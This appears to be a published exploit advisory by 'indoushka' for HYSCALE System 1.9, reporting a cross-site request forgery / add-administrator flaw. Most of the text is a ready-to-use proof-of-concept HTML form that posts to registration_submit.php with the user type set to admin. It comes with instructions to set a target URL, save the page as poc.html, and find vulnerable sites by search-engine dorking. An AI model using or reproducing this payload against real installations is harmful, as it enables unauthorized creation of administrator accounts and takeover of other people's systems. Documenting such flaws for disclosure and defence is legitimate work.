Headline
HYSCALE System 1.9 Add Administrator / Cross Site Request Forgery
HYSCALE System version 1.9 suffers from add administrator and cross site request forgery vulnerabilities.
=============================================================================================================================================
| # Title : HYSCALE System v1.9 CSRF add admin Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |
| # Vendor : https://www.kashipara.com/project/download/project2/user/2024/202402/kashipara.com_hyscaler19-zip.zip |
=============================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] This HTML page is designed to remotely add new admin.
[+] Line 10 : Set your target url
[+] save payload as poc.html
[+] payload :
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Registration Form</title>
</head>
<body>
<form action="http://127.0.0.1/HYSCALER19/registration_submit.php" method="POST">
<label for="username">Username:</label>
<input type="text" name="username" id="username" required><br><br>
<label for="email">Email:</label>
<input type="email" name="email" id="email" required><br><br>
<label for="password">Password:</label>
<input type="password" name="password" id="password" required><br><br>
<label for="dob">Date of Birth:</label>
<input type="text" name="dob" id="dob" placeholder="YYYY-MM-DD" required><br><br>
<label>Gender:</label><br>
<input type="radio" name="gender" value="Male" id="male" required>
<label for="male">Male</label><br>
<input type="radio" name="gender" value="Female" id="female">
<label for="female">Female</label><br><br>
<label for="usertype">User Type:</label>
<select name="usertype" id="usertype" required>
<option value="admin">Admin</option>
<option value="user">User</option>
<option value="guest">Guest</option>
</select><br><br>
<label for="target_sales">Target Sales:</label>
<input type="text" name="target_sales" id="target_sales" required><br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================